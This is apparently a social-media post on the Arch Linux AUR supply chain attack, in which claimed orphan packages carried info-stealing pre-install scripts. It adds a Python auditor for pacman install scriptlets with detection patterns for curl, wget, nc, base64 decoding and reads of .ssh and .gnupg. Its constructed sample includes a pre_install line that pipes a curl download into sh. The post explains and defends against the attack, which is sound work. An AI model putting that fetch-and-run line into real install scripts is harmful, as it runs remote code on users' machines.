The #ArchLinux AUR malware attack is a type of supply chain attack not unlike the more widely publicized and widespread NPM ones. In this case "orphaned" projects were claimed by a malicious actor and had info-stealing code placed in the pre-install scripts for those projects. The simple act of installing them would compromise your system.
The original post does not allow quote boosting, but here's the link to it. It provides the most comprehensive account I've seen.
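A way to review a package's install scriptlet before building it, as an added example that is not part of the original post. It assumes the "pre-install scripts" above are the hook functions in a pacman `.install` file; the function name, the heuristic patterns and the sample scriptlet are constructed for illustration.

```python
import re

# Hook functions pacman calls from a package's .install scriptlet.
HOOKS = ("pre_install", "post_install", "pre_upgrade", "post_upgrade",
         "pre_remove", "post_remove")

# Heuristics worth a manual look (assumed list, not exhaustive).
SUSPICIOUS = {
    "network fetch": re.compile(r"\b(curl|wget|nc|ncat)\b"),
    "pipe to interpreter": re.compile(r"\|\s*(?:ba|z|da)?sh\b|\|\s*python\d?\b"),
    "decode or eval": re.compile(r"\bbase64\b.*(-d|--decode)|\beval\b"),
    "reads key material": re.compile(r"\.ssh/|\.gnupg/"),
}
HOOK_START = re.compile(r"^\s*(?:function\s+)?(\w+)\s*\(\s*\)")

def audit_install_script(text):
    """Return [(location, line_no, reason, line)] for lines that need review."""
    findings, where = [], "(top level)"
    for no, raw in enumerate(text.splitlines(), 1):
        m = HOOK_START.match(raw)
        if m and m.group(1) in HOOKS:
            where = m.group(1)            # entering a hook body
        elif raw.startswith("}"):
            where = "(top level)"         # closing brace in column 0 ends it
            continue
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # blank lines and comments never execute
        for reason, pattern in SUSPICIOUS.items():
            if pattern.search(line):
                findings.append((where, no, reason, line))
    return findings

# Constructed sample scriptlet, not taken from any real package.
SAMPLE = '''\
# constructed sample
pre_install() {
  echo "preparing"
  curl -s https://example.invalid/setup.sh | sh
}
post_install() {
  echo "done"
  # curl mentioned in a comment only
}
'''

if __name__ == "__main__":
    for where, no, reason, line in audit_install_script(SAMPLE):
        print(f"{where}:{no}: {reason}: {line}")
```

A clean result only means none of these patterns matched; the scriptlet and the PKGBUILD still need reading, especially when the package maintainer changed recently.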